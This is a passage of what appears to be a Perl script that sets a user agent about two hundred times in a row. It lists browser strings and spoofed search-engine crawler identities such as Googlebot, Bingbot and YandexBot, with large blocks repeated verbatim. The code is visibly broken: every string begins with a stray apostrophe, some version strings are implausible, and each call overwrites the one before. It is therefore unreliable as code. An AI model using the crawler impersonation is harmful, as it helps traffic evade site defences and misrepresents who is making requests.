  4287. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  4288. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  4289. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  4290. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4291. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  4292. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4293. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  4294. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  4295. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  4296. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  4297. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  4298. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  4299. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4300. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  4301. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  4302. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  4303. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  4304. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  4305. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  4306. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  4307. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  4308. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  4309. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  4310. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  4311. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  4312. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  4313. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  4314. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  4315. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  4316. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  4317. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  4318. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  4319. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  4320. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  4321. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  4322. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  4323. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  4324. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  4325. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4326. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4327. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4328. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4329. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4330. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4331. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4332. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4333. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4334. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4335. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4336. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4337. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  4338. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  4339. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  4340. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4341. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  4342. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4343. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4344. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4345. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4346. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4347. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4348. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4349. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4350. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4351. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4352. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4353. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4354. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4355. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4356. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4357. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4358. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4359. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4360. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4361. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4362. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4363. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4364. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  4365. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  4366. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  4367. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  4368. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  4369. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  4370. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  4371. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  4372. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  4373. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  4374. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  4375. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  4376. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  4377. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4378. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  4379. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4380. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  4381. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  4382. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  4383. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  4384. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  4385. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  4386. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4387. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  4388. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  4389. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  4390. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  4391. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  4392. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4393. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4394. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4395. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4396. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4397. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4398. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4399. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4400. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4401. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4402. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4403. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4404. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4405. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4406. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4407. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4408. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4409. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4410. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4411. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4412. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  4413. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  4414. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  4415. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  4416. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  4417. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  4418. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  4419. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  4420. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  4421. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  4422. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  4423. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  4424. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  4425. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4426. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  4427. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4428. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  4429. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  4430. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  4431. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  4432. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  4433. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  4434. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4435. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  4436. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  4437. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  4438. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  4439. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  4440. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  4441. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  4442. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  4443. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  4444. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  4445. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  4446. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  4447. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  4448. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  4449. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  4450. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  4451. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  4452. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  4453. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  4454. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  4455. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  4456. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  4457. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  4458. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  4459. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  4460. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  4461. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  4462. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  4463. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  4464. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  4465. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  4466. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  4467. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  4468. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  4469. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  4470. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  4471. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  4472. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  4473. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  4474. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  4475. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  4476. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  4477. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
  4478. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  4479. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
  4480. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  4481. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  4482. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  4483. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  4484. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  4485. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  4486. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
